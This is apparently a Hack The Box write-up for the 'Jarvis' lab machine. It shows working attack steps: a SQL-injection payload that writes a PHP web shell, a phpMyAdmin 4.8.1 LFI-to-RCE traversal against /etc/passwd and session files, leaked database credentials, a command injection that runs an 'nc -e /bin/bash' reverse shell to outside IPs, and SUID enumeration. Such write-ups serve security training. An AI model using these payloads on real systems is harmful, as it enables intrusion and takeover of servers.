HTB Jarvis

Penetration Test
,

Web Content Discovery

When we found the another content room.php, we can find the SQL injection in this website.

Sql Injection

We find the parameter cod is vulnerable with SQLMAP.

phpmyadmin
Username: DBadmin
Password: imissyou

  1. We can log in with the password to phpmyadmin
  2. The smart way is write a malcious php page in the web contents with SQL Injection.
cod=-1 union select 1,'<?php=system($_GET[1]);?>' ,3,4,5,6,7 into outfile /var/www/html/cmd.php

phpmyadmin 4.8.0 Exploit


phpMyAdmin 4.8.1 LFI to RCE Vulnerability
https://www.vulnspy.com/phpmyadmin-4.8.1/
https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e

http://10.10.10.143/phpmyadmin/index.php?target=server_sql.php%253f../../../../../../../etc/passwd

Now, I’ ll include my php session info. I’ll check burp to grab my phpMyAdmin cookie, and visit:

http://10.10.10.143/phpmyadmin/index.php?cmd=id⌖=db_sql.php%3f/../../../../../var/lib/php/sessions/sess_e3qctegac4saf72rocbl1541j26u7mqm

www-data shell

We can get a www-data shell changing cmd

Enhanced your shell

With either shell, I’ll upgrade with the standard technique:

  1. python -c 'import pty;pty.spawn("bash")'
  2. [ctrl-z] to background shell
  3. stty raw -echo
  4. fg
  5. reset
  6. Enter screen if asked for a terminal type.

Priv: www-data –> pepper

run sudo -lto check what commands I can run as another HIGH PRIV users.

Command Injection

The we can find the vulnerable function exec_ping in simpler.py

www-data@jarvis:/tmp$ echo -e '#!/bin/bash\n\nnc -e /bin/bash 10.10.16.2 9002'
#!/bin/bash

nc -e /bin/bash 10.10.16.2 9002
www-data@jarvis:/tmp$
www-data@jarvis:/tmp$ echo -e '#!/bin/bash\n\nnc -e /bin/bash 10.10.14.8 443' > /tmp/d.sh
www-data@jarvis:/tmp$ chmod +x /tmp/d.sh
www-data@jarvis:/tmp$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
***********************************************
     _                 _
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/
                                @ironhackers.es

***********************************************

Enter an IP: $(/tmp/d.sh)

I got the pepper shell

Privilege escalation

find / -perm -4000 2>/dev/null
[-] SUID files:
-rwsr-xr-x 1 root root 44304 Mar  7  2018 /bin/mount
-rwsr-xr-x 1 root root 61240 Nov 10  2016 /bin/ping
-rwsr-x--- 1 root pepper 174520 Feb 17 03:22 /bin/systemctl
-rwsr-xr-x 1 root root 31720 Mar  7  2018 /bin/umount
-rwsr-xr-x 1 root root 40536 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 40312 May 17  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59680 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 75792 May 17  2017 /usr/bin/gpasswd

https://gtfobins.github.io/gtfobins/systemctl/